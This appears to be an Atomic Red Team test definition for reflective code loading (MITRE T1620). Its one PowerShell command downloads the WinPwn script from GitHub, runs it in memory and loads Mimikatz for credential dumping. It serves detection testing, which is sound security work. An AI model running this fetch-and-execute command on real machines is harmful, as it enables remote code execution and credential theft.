attack_technique: T1620
display_name: "Reflective Code Loading"
atomic_tests:
- name: WinPwn - Reflectively load Mimik@tz into memory
  auto_generated_guid: 56b9589c-9170-4682-8c3d-33b86ecb5119
  description: Reflectively load Mimik@tz into memory technique via function of WinPwn
  supported_platforms:
  - windows
  executor:
    command: |-
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      mimiload -consoleoutput -noninteractive
    name: powershell